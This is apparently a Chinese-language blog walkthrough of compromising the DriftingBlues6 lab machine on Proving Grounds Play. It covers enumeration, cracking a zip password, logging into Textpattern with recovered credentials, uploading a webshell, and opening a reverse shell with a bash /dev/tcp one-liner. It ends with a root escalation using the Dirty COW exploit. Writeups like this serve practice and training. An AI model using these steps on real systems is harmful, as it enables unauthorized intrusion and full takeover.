Proving Grounds Play : DriftingBlues6 Walkthrough

 Proving Grounds Play : DriftingBlues6 Walkthrough


Foothold :

  • 網站 robots.txt 告訴你要去找 *.zip 檔
  • 使用很大的字典檔後發現一組憑證
  • 使用該組憑證成功登入 CMS textpattern
  • 成功登入後上傳 webshell.php 檔案利用後拿到 Reverse Shell

PE :

  • kernel 太舊,利用 Exploit 建立一個 root 使用者
  • su 切換使用者成功 root

備註 : 標準的漏洞 dirtycow (髒牛)


Rustscan,└─$ rustscan -a 192.168.151.219 --scripts none --ulimit 5000 | tee rustscan



snmp check



nmap



whatweb



80 / 叫你不要駭它



80 /robots.txt 很親切的告訴你要加上 .zip 副檔名



80 /textpattern/textpattern

textpattern CMS



searchsploit 看一下發現 RCE 都要 Authenticated

所以有可能在某個 *.zip 檔案中可以發現



先嘗試測試一些常用帳號密碼發現都失敗



gobuster /



gobuster /textpattern



80 /textpattern/files



80 /textpattern/images



80 /textpattern/rpc



80 /textpattern/themes



gobuster /textpattern/textpattern 又發現一堆路徑



後續持續枚舉依舊沒有發現任何 *.zip 檔案,與相關可以利用的地方

換了一個字典檔從頭再開始爬一次,直接在根目錄發現了 zip 檔案 spammer.zip



將檔案抓回來解開看看發現要密碼,直接用 john 破解得到解壓縮密碼 myspace4

解開後發現一個 creds.txt 檔案內容寫了一個憑證 mayer:lionheart



透過拿到的憑證登入 textpattern 確認可以登入



發現可以上傳檔案的地方



上傳最愛的 webshell.php 但跳出告警,告警寫不要修改系統時間

也不知道有沒有上傳成功



點了 OK 後發現上傳成功



在 admin --> Preferences 底下點選左邊的 admin 在右邊發現上傳的路徑

/var/www/textpattern/files,即便不知道在 gobuster 時也有掃到這個路徑



去到 /textpattern/files 看到上傳的檔案如下



出現熟悉的畫面,測試一下 whoami



標準利用 bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1",拿到 Reverse Shell 了



找不到 local.txt,直接開始 PE,cat /etc/passwd,沒有任何使用者



sudo -l 沒有東西,檢查 SUID



linpeas 跑起來,發現 kernel 跳紅色的字體 Linux version 3.2.0-4-amd64



參考 Exploit DB 這一篇 https://www.exploit-db.com/exploits/40839



上傳 40839.c 到靶機,跟著 Exploit-DB POC 實作 gcc -pthread 40839.c -o dirty -lcrypt

chmod +x dirty 然後執行



會建立一個使用者 firefart 然後要我們輸入自己想要的密碼


直接 su firefart 輸入剛剛設定的密碼成功提權為 root

再找一次確認沒有 local.txt,成功獲取 proof.txt




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)